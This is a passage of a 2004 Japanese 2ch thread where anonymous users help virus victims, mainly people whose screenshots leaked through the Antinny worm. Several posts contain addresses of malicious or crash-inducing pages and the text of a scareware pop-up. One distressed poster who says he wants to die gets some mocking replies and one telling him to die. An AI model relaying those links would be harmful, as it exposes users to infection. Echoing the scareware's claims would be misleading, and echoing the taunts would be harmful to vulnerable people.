   丿 [ \|:::|/ ]  >"'''''   <ガリで。
   >、.>  U   <,.<        
  ノ  ! ! -=- ノ!  ト-、       
..''"L  \\.".//_ |   ゙` ]

701 :668:04/09/27 01:44:15
>>672
ありゃ〜。でもイキテくさださーい。
わたしには、それしか言う言葉がありませんです・・・。

つーか、おまいら反応早すぎ。でも、励ましてるからよし。

702 :名無しさん@お腹いっぱい。:04/09/27 01:44:43
おやじ、ガリ!

703 :名無しさん@お腹いっぱい。:04/09/27 01:44:50
>>672
ヤフーで「exe ファイル 捨てたい」で検索するんだ!

704 :名無しさん@お腹いっぱい。:04/09/27 01:45:09
>>672
おちんちんを高速でしごくんだ!

705 :名無しさん@お腹いっぱい。:04/09/27 01:45:16
まだyahooのトップページくらいならいいけどさ、
個人情報とかはやばいよな・・・・

706 :665:04/09/27 01:45:16
しかも相当恥ずかしいヤツを・・・。
何もかも割れてるし、知り合いが見てないことを祈るだけだ。
何回もアップされてたみたいだし、過去の2chの苺きんたまスレで
自分の画像がアップされてるのも見た。
さっきから何も手につかなくて、部屋の中うろうろしてる。
さっきまでお腹がすいていたはずなのに、そんなことどうでも良くなってる。
まるで部屋の中に隠しカメラがあって、トイレからオナニーまで覗かれた気分だ。

707 :名無しさん@お腹いっぱい。:04/09/27 01:45:45
      ,-――――――-.
      /           |
     /           |
     /             |
    l"ジェンキン寿司   l
   ,、_lー-―――――‐--、/l
   i ト、ミミ ,r‐- 、``'ニ=‐、.彡リ.
   ヾ,iハ゛.´ _,,、_  i.; _,. ` 彡'i)
    `、j,'  `゚''´:.ノ i::<・ゝ) .ハン       >>702へいっ!!!がりおまちっ!!!
     i,   ` ,、/ i_ `` ,r'          そろそろ巣に帰るぞ
   ,r〃'i  ,r'ヽ、 _,〉  /.
   /i:ト、;;i,  ミ=_‐_-, 'i /ヽ__
r-‐'´i::::ハ;;ヾ、‐‐-、  ノ´/i:::'i`i‐- 、_
::i' .l:i 'i::::i ヾ;;`‐---‐'i':/ i、 'i::! i::::i `
:i' i:| !:::l _,r.、;;;;;,r''´ヽi. ll::i i::i l:::'i


708 :名無しさん@お腹いっぱい。:04/09/27 01:46:08
なんかネタ臭いな

709 :名無しさん@お腹いっぱい。:04/09/27 01:46:44
この調子で感染者の見てる先
いろんなところに爆撃されてます

710 :名無しさん@お腹いっぱい。:04/09/27 01:46:45
>>672
お前は本当にすべてを捨てれるんだろうな?

711 :名無しさん@お腹いっぱい。:04/09/27 01:46:48
>>707
いいショウガ使ってるねー!
巣に帰るよ。

712 :665:04/09/27 01:46:58
吐きそう

713 :名無しさん@お腹いっぱい。:04/09/27 01:47:30
>>706
ネタ90%
嘘はもうちょっとうまくやろうな。

714 :665:04/09/27 01:48:10
泣きそう

715 :名無しさん@お腹いっぱい。:04/09/27 01:48:31
>>665
それより直したかぁ?
そうでないとここで見てる画像がアップされて二重に祭りになるぞ

自分の名前を見てるスレで発見したところのキャプチャという
笑えない画像がたくさん生み出されてるぞ

716 :665:04/09/27 01:48:39
嘘だったらどんなに嬉しいか。
変なexeファイルを開いた瞬間に気付くべきだった。
もう外にも出たくない。本当に死にたい。


717 :名無しさん@お腹いっぱい。:04/09/27 01:50:26
>>716
( ´_ゝ`)フーン

718 :名無しさん@お腹いっぱい。:04/09/27 01:50:45
>>716
下手に騒がなければ一時的なネタとして流れるから安心しる!

719 :名無しさん@お腹いっぱい。:04/09/27 01:51:10
>>716
落ち込む気持ちも分かるが
まずは対応しろ
このままだとマズイだろ

720 :名無しさん@お腹いっぱい。:04/09/27 01:52:00
>>716
死ぬ気になれば何だって出来るさ
まとめサイト読むなり
ノーd手動でアップデートするなりガンガレ

721 :名無しさん@お腹いっぱい。:04/09/27 01:52:27
>>716
市ね

722 :名無しさん@お腹いっぱい。:04/09/27 01:52:28
>>716
変なexe開いた瞬間にPCがあぼーんしなくてよかったな

723 :名無しさん@お腹いっぱい。:04/09/27 01:52:34
>>716
個人情報が流れてない限りは早く駆除しとけ

724 :名無しさん@お腹いっぱい。:04/09/27 01:52:40
とりあえずShellSystem.exe消して再起動しる

725 :名無しさん@お腹いっぱい。:04/09/27 01:53:28
>>714
安心しろ
お前のデスクトップのSSがどれかは分からないが
この2日以内にうpされたのなら確実に保存している

726 :名無しさん@お腹いっぱい。:04/09/27 01:53:41
俺と会ってみろ。
お前を救えるかもしれない。

727 :名無しさん@お腹いっぱい。:04/09/27 01:53:44
>>716
宇宙ヤバイ
まじ広い

728 :名無しさん@お腹いっぱい。:04/09/27 01:53:50
>>716
自己責任だバカやろう

729 :名無しさん@お腹いっぱい。:04/09/27 01:54:02
げ、もう3時かよ!

730 :名無しさん@お腹いっぱい。:04/09/27 01:54:25
てかこのスレ自演できるじゃねえか

731 :665:04/09/27 01:54:32
>>723
もう流れてる。
>>716
ホントに一時的な祭りだったらいいけど・・・。

732 :名無しさん@お腹いっぱい。:04/09/27 01:54:41
>>716
んで今は何から書き込みしてるの?
対処してないなら書き込んでるSSが晒されたりしちゃうよ

733 :665:04/09/27 01:55:25
長くいてすいません。
でも、一人になると気が狂いそう。

734 :665:04/09/27 01:56:47
>>732
もう対処できたと思う。多分。
タスクマネージャーでは、shellsystem.exeがもうないから

735 :名無しさん@お腹いっぱい。:04/09/27 01:56:48
>>733
ぢゃ、気が狂ってください^^

736 :名無しさん@お腹いっぱい。:04/09/27 01:56:57
>>731
ユーザー名くらいでしょ?無問題では?

737 :名無しさん@お腹いっぱい。:04/09/27 01:57:09
>>733
個人情報がどのレベルで漏れたか詳細きぼん

738 :名無しさん@お腹いっぱい。:04/09/27 01:57:51

お前らそれ以上はスレ違いだから続きはこっちで↓
http://etc3.2ch.net/test/read.cgi/entrance/1096118923/


739 :名無しさん@お腹いっぱい。:04/09/27 01:58:09
詳細書くと特定されるんじゃね?

740 :名無しさん@お腹いっぱい。:04/09/27 01:59:15
なら何も言わず黙ってるしかないな

住所さらされてるヤツよりマシだと思え

741 :名無しさん@お腹いっぱい。:04/09/27 02:00:37
まさか創k(ry

742 :名無しさん@お腹いっぱい。:04/09/27 02:00:40
そもそも晒されたー
って言っておきながら回線切ってない時点で嘘決定。
回線切ったらネタを書き込めないもんな。

743 :名無しさん@お腹いっぱい。:04/09/27 02:00:43
>>726
坂田師匠キタ━━━━━━(゚∀゚)━━━━━━ !!!!!

744 :名無しさん@お腹いっぱい。:04/09/27 02:00:49
>>726
ガンツキタ━━━━━(゚∀゚)━━━━━!!!

745 :名無しさん@お腹いっぱい。:04/09/27 02:01:37
>>665
家族写真と職業住所割れて電話でお知らせと比べてどう?

746 :名無しさん@お腹いっぱい。:04/09/27 02:01:51
糞にまみれたーー

747 :名無しさん@お腹いっぱい。:04/09/27 02:02:00
>>734
レジストリを高速でスキャンするんだ!!

748 :名無しさん@お腹いっぱい。:04/09/27 02:05:20
>>665
俺なんか躁うつ病だけど、躁のときに
自分の写真つきで住所・氏名・電話番号を
ネットのあらゆる所にバラまいて
しかも荒らしたり煽りまくって、webarchiveに今もあるだろうけど
バラまきすぎて対処できなくて諦めてるが生きてるぞ!
いまだにイタ電くるぞ!

キンタマなんか色んな奴がかかってる
すぐにおさまるし大丈夫だ!

749 :665:04/09/27 02:06:27
>>748
ありがとう。なんか涙でてきた。

750 :名無しさん@お腹いっぱい。:04/09/27 02:08:47
>>749
がんがれ

751 :665:04/09/27 02:10:37
今回何人くらいがかかってるんだろう

752 :名無しさん@お腹いっぱい。:04/09/27 02:12:52
知らせてくれた人に感謝するんだぞ。
どんな時でも感謝の気持ちを忘れちゃいけない。

753 :名無しさん@お腹いっぱい。:04/09/27 02:14:55
明日からは会社でロリファイル落としてたやつらのPC画像がUpされるだろうから
もっと悲惨だぞ

下手すると会社クビな上に個人情報晒しまくり


754 :名無しさん@お腹いっぱい。:04/09/27 02:16:28
ああ、もう24スレも先が見え始めてきたな。
相変わらず、こんなところに質問書き込んでまともに答えが出るの期待してる奴大杉だな。

755 :名無しさん@お腹いっぱい。:04/09/27 02:17:07
>>751
もんのすごい数が感染してる
苺キンタマ監視所スレを途中まで見てたけど
飽きて今はもう見てられないぐらいの数
大人の実況板行ってみ

756 :名無しさん@お腹いっぱい。:04/09/27 02:19:49
exe 踏まなきゃ感染しないんでないの? FW で防げるとか

757 :名無しさん@お腹いっぱい。:04/09/27 02:20:40
私だって寝てないんだ!

758 :名無しさん@お腹いっぱい。:04/09/27 02:24:10
オマイラこのまま1000までいくつもりか?ええ?

759 :名無しさん@お腹いっぱい。:04/09/27 02:28:43
FWのことはよくわからないが
通常→シェリーとかいう.exeがネットワークにアクセスしようとしています
許可しますか? というのが出てくるはずで
そこで拒否すれば防げると思うのだが どうだろう
間違ってたら教えてくだされ

760 :名無しさん@お腹いっぱい。:04/09/27 02:37:18
>>665
お前のSSなんか、きんたま監視所にエロ画像貼りまくったら
興味なくして誰も見なくなる

761 :名無しさん@お腹いっぱい。:04/09/27 02:48:26
〜回目っていうのは、その分すべてがアップされてるのでしょうか?
それともそのうちの数回分だけ?


762 :名無しさん@お腹いっぱい。:04/09/27 05:44:45
>>761
運による うまく送信できればアップされる

763 :名無しさん@お腹いっぱい。:04/09/27 05:46:46
失礼します。
ファイル名を指定して実行でregeditと入れると
メモ帳が開くんですが、これは金玉に感染しているということですよね…?

764 :名無しさん@お腹いっぱい。:04/09/27 05:49:49
ご愁傷様

765 :名無しさん@お腹いっぱい。:04/09/27 07:00:59
2chの某スレのリンクを踏んだらパソコン(ウィンドウズ98)の具合が悪くなりました
 ・インターネットエクスプローラーが開かない
 ・突然インターネットエクスプローラが開き、エロサイトにつながる
 ・でも他のページにはいけない
 ・パソコンから定期的に「ギギガガ・・」という音がしてなにか読み取られてるのか
  あるいは書き込んでいるのかとても不安

ノートンのライブアップデートを行って調べてみたら
Trojan.Adclicker に感染してると結果がでました
削除してねとお願いしたら、ノートンさんは削除できませんでしたと言います
ノートンさんのおかげで感染ファイルはわかっているので
手動で削除しようとしたら、このファイルはウィンドウズが使っているので削除できませんと表示されます
どうすれば治すことができるのか、わかる方ご指導お願いします



766 :名無しさん@お腹いっぱい。:04/09/27 09:38:00
>>765
セーフモードで駆除するだけ

ライブアップデートって事は、全然普段アップデートしてねえのか
自動的にアップデートできるように設定しておくといいよ
あと常駐保護の設定もきちんとやっておけ

767 :名無しさん@お腹いっぱい。:04/09/27 09:38:03
>>765
再インストール

768 :765:04/09/27 16:09:02
ご指導ありがとうございます
セーフモードでは起動できませんでした
何度やっても途中でフリーズしてしまいます
仕方ないので、リカバリーCDをかけてみようと思います



769 :名無しさん@お腹いっぱい。:04/09/27 16:40:12
教えてくれよ〜
IE開くと「表示出来ないページ」というのが延々とでてくるんだよ
なんなんでしょ???

770 :名無しさん@お腹いっぱい。:04/09/27 16:58:37
>>769
板違い
初心者板行け

PC初心者
http://pc6.2ch.net/pcqa/

771 :Yahoo!メールやばくない?:04/09/27 17:02:21
ここ数日の間に

12608@ t.vodafone.ne.jp

noreply@daitinoaka

webmaster@ wakuwaku21.com

u@docomo.ne.jp

の四つのメールアドレスからウイルスの入った添付ファイルが送られて来ました

本文が英語で書いてあり、連絡事項のような内容です

注意してください

772 :名無しさん@お腹いっぱい。:04/09/27 17:13:05
pc内のmp3データがどんどん侵食されて再生不能になっていくんですがウイルスなんでしょうか?



773 :名無しさん@お腹いっぱい。:04/09/27 17:44:16
わっがんね

774 :名無しさん@お腹いっぱい。:04/09/27 17:51:23
>>772
nyやめて、回線切って隠居しろ

775 :772:04/09/27 17:56:39
>>774
わかりました。どうもありがとうございます。


776 :名無しさん@お腹いっぱい。:04/09/27 18:51:07
職人さんによる今回の「苺きんたま」ウィルス騒動のまとめフラッシュ
http://douch.net/cgi-bin1/src/up0281.swf

777 :名無しさん@お腹いっぱい。:04/09/27 18:53:16
>>772
一個だけマジレス
それは「ぬるぽ」です。駆除の仕方はdownload板とかで調べてください。
ny関係はそっち。

778 :名無しさん@お腹いっぱい。:04/09/27 19:07:26
                       _,、、、、、、、,_          n
                     ,riTl|l.il|..ll..|ll.i..lli、         y
                     ril l!|.|l|.l||!.l|.|l|lil.l|l|l     回  や
                     ||l!i!|州l|l|ll||lllミillll|l|     線  め
                    !|||ラ''' '´!|ll||l!lソ|||l||     切  て
              隠       `t'_,,,ヽ   i´l州      っ
              居        ゙iー ''  /i',ノ'゙入    て
              し        `ー'、´ /,r'´ ,>、
              ろ          ,イy' /  /,r ヽ,
                       ,r'// /  /,i' '  i ゙、
                         /,/li,/ ,/,i',i' ,r ,r7' ヽ,i.
                      〃,//l/ .// ,' /'´ /   ハ.
                    /,' / l./  ,i'i l//  /   / l
                   / ,i ,i ,!/  ,i' l // ,/   ,/  l.
                  ,/ l l i l./  !i .l / _,/  /   l!
                 ,r'=‐、_ll_!j'_,_、-‐、‐'   __,,.     !l.
                /ノ /´/ ``ヽ、 `  ``''''"´      ,! l
               /´ ,/-/     ``  ``ヽ、、___,,   i  l
                / ,.イl /       ,.r‐ ``ヽ、,__    ,! ./!l
             /  jly'     - '´           i i !.|
             〈_/'V |l `'‐‐‐‐‐‐‐‐‐‐‐‐_,,,、、-‐‐''  !    |
             } ,/ l!',>、 ___,,,、、-―''´―-、、‐'   !    |
             レ'/ / i/l! い、_``ヽ、、______,        _,,ノ
             〉',/l j/:l!:l ヽ ゙、__ ̄ ̄____,/     `'ー‐'ン'l.l

779 :名無しさん@お腹いっぱい。:04/09/27 19:09:21
//www.cty-net.ne.jp/~taitiro/imgboard/data/img20040825044524.jpg
これもブラクラですが、踏んでしまったらどうしたらいいですか・・・?


780 :779:04/09/27 19:13:59
↑ブラクラじゃねぇ!ウィルスのサイトだった。どうしたらいいですか?

781 :名無しさん@お腹いっぱい。:04/09/27 19:14:12
>>779
       ,    -―-  、
       /            \
    /     /| /| ハ    ヽ_
   / /  / / // | | |  ヽ / /
  / _/ / / |/ |/  v N | | |/ /|   / ̄ ̄ ̄ ̄
   | ./ / |/TΤ   ГTヽ|( (/))| < マルチ
   |/レ | 〉 -┘ 、 └-  V ~ | |  \____
       v\ ″ ー  ″ イv w N
        ^ ` ー-    ノ  ヽ
         | |  |  /  / ∧



782 :名無しさん@お腹いっぱい。:04/09/27 19:19:10
苺きんたまに感染したらCPU使用率って常に100%なんですか?
CPU使用率が10%前後だったら感染してないって思って大丈夫?

783 :名無しさん@お腹いっぱい。:04/09/27 19:22:24
>>782
タスクマネージャーで確認しましょうね。
ctrl + alt + del
shellsystem.exeが起動してたら残念賞。

784 :名無しさん@お腹いっぱい。:04/09/27 19:36:53
>>783
返答ありがとうございます!
shellsystem.exeはなかったんだけど亜種が心配で…。

785 :名無しさん@お腹いっぱい。:04/09/27 19:39:59
>771
今頃何をほざいてお出でですかw


786 :名無しさん@お腹いっぱい。:04/09/27 21:09:20
>>779
http://www.itmedia.co.jp/enterprise/articles/0409/24/news006.html
これなのかな?

787 :失意のぼる:04/09/27 21:27:17
>>779
>>442
バコバコ踏むな
過去スレぐらい検索しろ
>>786 偽装html

788 :名無しさん@お腹いっぱい。:04/09/27 21:29:02
「安全なInternet Explorer」はWindows XP SP2にのみ提供される
http://japan.cnet.com/news/ent/story/0,2000047623,20074797,00.htm

789 :名無しさん@お腹いっぱい。:04/09/27 21:29:12
>786
>779の中身はHTMLなので違うと思われ

790 :名無しさん@お腹いっぱい。:04/09/27 21:59:29
>>787
マルチに答えるな、クソぼる

791 :失意のぼる:04/09/27 22:03:04
>>790
うるせえカス。まともな回答もできんクセに。

792 :名無しさん@お腹いっぱい。:04/09/27 22:03:47
W32.Randex.genというウィルスをノートン先生が見つけたんですが、
検疫できなかったのでノートン先生の画面に「自動的に削除をお勧めします」
と出てるんですが、感染してるファイルがよりによってmsconfig
これ本当に削除していいんですか・・・?

ちなみにwinfix3というファイルは見つかってません。誤診でしょうか?

793 :名無しさん@お腹いっぱい。:04/09/27 22:03:57
>>791
甘やかすなハゲ

794 :失意のぼる:04/09/27 22:06:05
>>793
ほれ。質問来たぞ。まともな回答しろや

795 :名無しさん@お腹いっぱい。:04/09/27 22:09:43
>>794
お前がやれよ
マルチにも答えてやる親切な人なんだろw
ぼるスレでもマルチに答えてたよな。成長しろよ。

796 :名無しさん@お腹いっぱい。:04/09/27 22:11:05
>>794
ヒッキーの仕事を取ったら悪いのでやめとく。ほれ、仕事しろ。

797 :名無しさん@お腹いっぱい。:04/09/27 22:14:09
OKOKOKOKOKOKhttp://

アドレスを貼って移動しようとするとこのように邪魔されるんだけど
これは何ですか?

798 :名無しさん@お腹いっぱい。:04/09/27 22:19:02
>>792
削除していいよ
ファイルの修復方法はまた来週ね

799 :名無しさん@お腹いっぱい。:04/09/28 06:43:40
ノートン先生が捨てろと言ってるんだから素直に捨てろ!全部捨てろ。

800 :名無しさん@お腹いっぱい。:04/09/28 18:23:15
Alt+Ctrl+Deleteが効かないのですが、何かウィルスですか?

801 :名無しさん@お腹いっぱい。:04/09/28 18:28:26
>>800
>>86のテンプレ使用せよ。

802 :792:04/09/28 20:08:05
それが・・・何故か削除できなかったぽ
システムの復元もオフにしてるのになあ

803 :名無しさん@お腹いっぱい。:04/09/28 20:35:55
>802
おまいも>86にのっとって環境書いてくれ

804 :名無しさん@お腹いっぱい。:04/09/28 20:46:13
>>802
セーフモードで削除後、変更されたレジストリを元に戻す
http://www.symantec.com/region/jp/sarcj/data/w/w32.randex.gen.html

805 :名無しさん@お腹いっぱい。:04/09/28 23:04:36
一週間ほど前から
ノートンファイヤーウォールが
「リモートホストがコンピュータにアクセスしようとしています」という警告が出ます。

リモートアドレスとローカルアドレスが毎回違うので
「常にこの処理を使う」にチェックを入れても効果がありません。

ノートンのビジュアルトラッキングでは
一番最後のドメイン情報は 222.121.184.11と出ていますが

これってウィルス? 

806 :名無しさん@お腹いっぱい。:04/09/28 23:13:06
バスターのオンラインスキャンで TROJ_DIALER.N を検出したんですが
バスターに情報は無く、ググっても見当たらないので、ご存知の方いましたら情報お願いします。

807 :名無しさん@お腹いっぱい。:04/09/29 00:14:35
なぜか急にいろんなフォルダにdesktop.iniが出来たんですが、
これは何かのウイルスによるものなんですか?

808 :名無しさん@お腹いっぱい。:04/09/29 00:15:08
>>805
ただのポートスキャンか、踏み台にされたやつが
トロイをばらまきに来ているだけだろ。

おそらく無問題。


809 :名無しさん@お腹いっぱい。:04/09/29 01:50:01
>>807
マルチ

810 :名無しさん@お腹いっぱい。:04/09/29 02:05:34
windows起動時にmoleboxというPOPウィンドウが開くのですが・・・
何かウィルスに感染したのでしょうか?
ノートンは反応なしです。

811 :名無しさん@お腹いっぱい。:04/09/29 02:16:17
ノートン一昨日定義でダクロリ踏んだらウイルスメールがたくさんきました。
みなさんも気をつけて…

812 :名無しさん@お腹いっぱい。:04/09/29 05:09:10
最近質問の仕方がひどいな

813 :名無しさん@お腹いっぱい。:04/09/29 06:30:55
>812
禿同。慌ててここに書き込むより状況を整理してからでしょ。順序は大事。

814 :名無しさん@お腹いっぱい。:04/09/29 09:55:48
>>812
他のスレもそうだが、わざとやってるとしか思えん。

815 :名無しさん@お腹いっぱい。:04/09/29 10:59:34
ttp://www2.strangeworld.org/uedakana/sahra6138.jpg
さっきこれ踏んだらメール作成画面が死ぬほどでてきて
フリーズしたんで強制終了したんですが
何かウィルスが入ってるんでしょうか
今の所パソコンに異常はありません
もしウィルスがあるのであれば
どういった症状になるのかも教えてください
よろしくお願いします

816 :名無しさん@お腹いっぱい。:04/09/29 11:03:31
わざとでしょ

817 :名無しさん@お腹いっぱい。:04/09/29 11:05:44
>>815
ここは鑑定スレではありません
てゆうか、やるべきことをまずやってから改めて来てください

818 :名無しさん@お腹いっぱい。:04/09/29 11:52:42
なんか Tウイルス に感染したっぽいんだけど・・・
友達なんて共食いしてるし


819 :名無しさん@お腹いっぱい。:04/09/29 11:57:48
>>818
それは大変ですね・・・解決方法は、街を丸ごと爆破するしかないのかもしれません。
やる場合は自己責任でやってね。

820 :792:04/09/29 13:06:04
解決しました、一応報告までに。
みなさんありがとうございます。

821 :名無しさん@お腹いっぱい。:04/09/29 16:48:24
>>815
mailtoのブラクラ。ウイルスが心配ならスキャンすりゃいいだろが。
そんな聞きかたしてくるような奴だからどうせアンチウイルスソフト入れてないんだろうけど

822 :名無しさん@お腹いっぱい。:04/09/29 17:16:03
質問させてください。
今日、ノートンが「VBS.loveletter.var」を検出しました。
うちのノートンは更新してないのでトレンドマイクロのオンラインスキャンでスキャンしたところ
感染ファイルは見つかりませんでした。(スキャンの間ノートンは警告出しまくりでしたが。)
それで私はノートンが誤反応起こしてるのではないかと思い、
インターネットオプション→一時ファイルの削除、履歴の削除を行いました。
再び、スキャンしてみたところ、ノートンは警告を出しませんでした。
これって結局ウィルスじゃなくてノートンを誤反応起こさせるいたずらですよね?


823 :名無しさん@お腹いっぱい。:04/09/29 17:33:42
strangeworldにひっかる奴がまだいることに驚いた


>>822
はい

824 :名無しさん@お腹いっぱい。:04/09/29 17:52:21
>>823
レスありがとうございます。
ちなみにloveletter駆除ツールを使っても感染してないって出てたんで
いたずらかなとは思ってたんですが。

825 :名無しさん@お腹いっぱい。:04/09/29 18:21:24
>>824
こちらも見たほうがいいかな。多分そこもやられてるんで、誤反応するかも

ノートンがvbsウィルスのソースに誤反応2
http://pc6.2ch.net/test/read.cgi/pcqa/1033948204/l50

826 :名無しさん@お腹いっぱい。:04/09/29 19:07:00
>820
治って良かったね。

827 :名無しさん@お腹いっぱい。:04/09/29 19:38:44
ウイルスでTROJ_VB.JLってのに感染してるみたいなんですが
ウイルスバスターの最新版で検索したら感染ファイルは見つかりません
でしたってでるんですけど
ウイルスログを見ると隔離できません削除できませんってなってるんですけど
これって感染してるんですか?

828 :名無しさん@お腹いっぱい。:04/09/29 19:50:01
>>827
感染してると思うよ
アンチウィルスソフトがあるからと言って、そこで安心しちゃった貴方の負け

829 :822:04/09/29 20:27:05
>>825
VBS.loveletter.varでググッたところそのスレが検索されたのでログはすでに見ました。


830 :名無しさん@お腹いっぱい。:04/09/29 21:36:26
ttp://default-homepage-network.com/start.cgi?hkcu
を、ある理由で興奮&焦ってたんで、周りの反応をうかがわずについ・・・

なにやら怪しげなページにとんで、怪しげなウインドウが開き、
妙なアニメキャラ泣き声にありそうな効果音の後に、CDが勝手に開いたり・・・
深夜徹夜でもうろうとした中焦って電源切っちゃったり・・・

感染したんでしょうか?

831 :810:04/09/29 21:40:33
わざとではなかったんです、すいません。。。

molebox launcherというのが起動時に表示されるようになった同時期に
ノートンアンチウィルス2004がウィルス名W32.Spybot.Wormを検出しました
でもノートンでは最新のウィルス定義でも削除できなかったため
自分なりに調べて似たような症状のことがカキコしてあるスレを見つけ(下記参)
ttp://www.google.co.jp/search?q=cache:KvwSARYNxVQJ:etc.2ch.net/test/read.cgi/qa/1070828680/51-150+molebox+launcher&hl=ja&lr=lang_ja
を参考にレジストリを削除しようとしたのですが
"Winsock32driver"="win32server.scr"という名前のものも似たような名前のものも見当たらず
セーフモードでウィルスとされているファイル(srss.exe)を削除しました
そのあとノートンでスキャンしたところウィルスは感知されなかったため
安心して再起動したとこと、またmolebox launcherが・・・
ノートンで感知してたウィルスとはまた違うものなのか?と思い
助けを求めたのが>810のカキコです。。。
今日、仕事から帰ってきてPCを見たところ昨日削除したと思われたウィルスと
同じ名前のウィルスが違う場所それも数箇所に拡散してました。。。
PC初心者の私ではもうどうしたらいいのかわかりません・・・

832 :名無しさん@お腹いっぱい。:04/09/29 21:45:25
>>830
「ブラクラ&ウイルス」らすい。
要ウイルスチェック

他にも症状があるならコッチへ
エロサイト見たら…助けて下さい!Part41
http://pc6.2ch.net/test/read.cgi/pcqa/1095834281/l50
テンプレよく読んで、指示を実行すること。

833 :名無しさん@お腹いっぱい。:04/09/29 21:57:28
>>830
スクリプト実行オフの時は、なんともなかった。
オンの時はDOS窓風の窓が表示されて、
「CDドライブが開いてたら、ウチのスパイウェア検出ソフトを使ってよ」
と宣伝っぽいことが書かれてた。
以下メインの窓に書かれてたこと
IMPORTANT SECURITY NOTICE FROM SPY DELETER!

Is your computer suffering from any of the following symptoms:

1. Has your browser's START PAGE changed?
or 2. Are you seeing a recent increase in annoying POP UPS?
or 3. Have PORN ads appeared in your browser or email?
or 4. Has your computer been acting wierd lately?
or 5. Is your Internet slower or even crashing?
or 6. Do you think your computer may have a virus?
or 7. Have new programs or toolbars been added without your permission?

If your computer is experiencing any of these symptoms...

It is almost certain that "spyware" has taken over your computer,
and the problems will only get worse quickly. Plus your sensitive
information like credit cards and all of your passwords can be
retrieved by criminals all around the world. This is a very scary
problem that needs immediate attention! You NEED to get this fixed now!

Click on THIS LINK FOR IMMEDIATE HELP and your computer will be
back to normal and secure again in just a few minutes.

834 :名無しさん@お腹いっぱい。:04/09/29 22:12:06
>ある理由で興奮&焦ってた

またロリか

835 :名無しさん@お腹いっぱい。:04/09/29 22:14:54
>>832
リンク張るような馬鹿に返答するなよ。

>>830
リンク張るな、ボケ。
おまえ見たいなうっかりさんが踏んだら、更に被害者が出るんだぞ。
そうならリンク張ったおまえが加害者だ。

836 :名無しさん@お腹いっぱい。:04/09/29 22:17:24
>827
まずは>86の通りに書け
話はそれからだ

837 :名無しさん@お腹いっぱい。:04/09/29 22:19:31
>>835
h抜いてるから問題ないと思われ
直リンするヴァカに関しては同意

838 :832:04/09/29 22:20:44
>>835
えー、直リンにしてないからいいと思ったんだけどな・・・。

839 :名無しさん@お腹いっぱい。:04/09/29 22:22:46
h 抜いても2chブラウザ使ってる人には直リンと何も変わらないんだが・・・


840 :名無しさん@お腹いっぱい。:04/09/29 22:24:28
>>839
あー、スマソ
漏れはoperaで2ch(実況を除く)してるヴァカもんなんで、忘れてた。

841 :832:04/09/29 22:28:19
>>839
俺も2chブラウザ使ってるから、わかるんだけど。
このスレではh抜いても直リンとみなす事にするの?

842 :名無しさん@お腹いっぱい。:04/09/29 22:31:21
>>841
俺は直リンでないに一票を投じることにしよう

843 :名無しさん@お腹いっぱい。:04/09/29 22:31:37
した方が良いんじゃない?
835はちょっとキツク言い過ぎだけど。

844 :名無しさん@お腹いっぱい。:04/09/29 22:39:14
直リンとはいわんとは思うがここは鑑定スレじゃないって話じゃなかったか?

845 :名無しさん@お腹いっぱい。:04/09/30 00:09:18
XPホームエディションですが、今日急にウイルスバスターが「DIAL_JAPUP.A」を
何度となくリアルタイム検出するようになりました。
トレンドのHP見てもこのウイルスの情報がありません。
どうやらダイアラーとかいう勝手に回線接続な奴みたいなのですが、
お助けくださいませ。
 JPUPD.EXE
 WNK**.EXE
とかいうファイル名でよく検出されます。
XPのSP2らしき自動アップデートを今日やったのですが、これが原因?
よろしくお願いします。

846 :名無しさん@お腹いっぱい。:04/09/30 00:50:37
ここ見てると、テンプレも読めないヤシらしかウイルス感染してないのが良くわかる。

847 :名無しさん@お腹いっぱい。:04/09/30 00:58:57
>>845
なんか「反日的」な名前だなw
バスターのウイルスログの内容はどーなってるのだ?
セーフモードでスキャンした?

848 :名無しさん@お腹いっぱい。:04/09/30 01:38:34
>>846
なんかマヌーやっちゃってる?俺・・・

>>847
ありがとう、セーフモードスキャン試してみます。
ログは、\Local\settings\Temporary Internet Files\Content.IE5\ の
下位フォルダにJPUPD*.EXEが、
\Local\settings\temp\ にwnk**.exeが検出され、どれもアクセス拒否処理を
行ったとなってます。

849 :名無しさん@お腹いっぱい。:04/09/30 02:22:27
2ちゃんねる見てた時急にメール受信の画面が出てきて、何も操作ができなくなってしまいました。
自分で動かすことができないのに誰かが勝手に動かして受信メールを一個ずつ開いて見られました。
まるでおばけが乗り移ったようでした。なんなんでしょう?
これはウイルスですか?ウイルス対策を何もしていない状態だったので可能性はありますよね。

850 :845:04/09/30 03:54:16
セーフモードスキャンはなぜかバスターが初期化できないと言ってうまくゆかず。
しかしセーフモードからシステムの復旧ができたことに気付いて、
検索とでウイルス見つけて削除、さらにレジストリエディタで関連データ消して
復旧に成功しました。 ついでに紛れ込んでたのも削除。
乙でした。

851 :名無しさん@お腹いっぱい。:04/09/30 06:26:03
ネットを開くと、アドレスバーの下に新しく
SearchとCorporation 、Internet 、Rights 、Japan 、C 、Copyright 、Reservedっていうのが出ます。
さらにデスクトップの下部に青っぽいタスクバー2本分の大きさの何かが出てきて、
Make MoneyとかMusic、Casinoって書いてあります。
恐くなってNortonで全スキャンしたんですが、何もありませんでした。
直し方教えてください

852 :名無しさん@お腹いっぱい。:04/09/30 06:45:56
>>851
スパイウエアにいかれとるわ。直し方はこっち

ttp://higaitaisaku.web.infoseek.co.jp/index.html

853 :名無しさん@お腹いっぱい。:04/09/30 06:50:37
ありがd!!!

854 :名無しさん@お腹いっぱい。:04/09/30 07:52:55
市満のオンラインスキャンってもう苺きんたま検出できる?

855 :名無しさん@お腹いっぱい。:04/09/30 09:30:11
>>833
ありがとうございます!
>>834
違います。サッカーのネット中継を早く見たくて「ここで○対○の試合見られるよ」って言うのをつい。

リンクの件はすいませんでした。では、htまで抜けば平気ですか?
以後気をつけます。

856 :名無しさん@お腹いっぱい。:04/09/30 09:42:35
オンラインスキャンしたら下記のようなウィルスに感染していたのですが、駆除方法を教えてください。

Virus:Trj/Downloader.GK 駆除不能 C:\Documents and Settings\userID\Local Settings\Temp\THI4A84.tmp\twaintec.cab[polall1t.exe

手動しかないのでしょうか?
その場合、このファイルを手動で消しても問題はないのでしょうか?

857 :名無しさん@お腹いっぱい。:04/09/30 10:24:07
>>856
http://www.pandasoftware.com/virus_info/encyclopedia/overview.aspx?lst=sol&idvirus=48242
ココイケ
オンラインスキャンするなら別にパンダでも何でもいいけど
ここに書き込むならシマンテックとかのウイルス名にしてくれ

858 :名無しさん@お腹いっぱい。:04/09/30 10:59:30
質問させてください。ウイルスについてですが、例えば苺きんたま
であれば「〜.exe」という形になってますよね?それでそのファイル
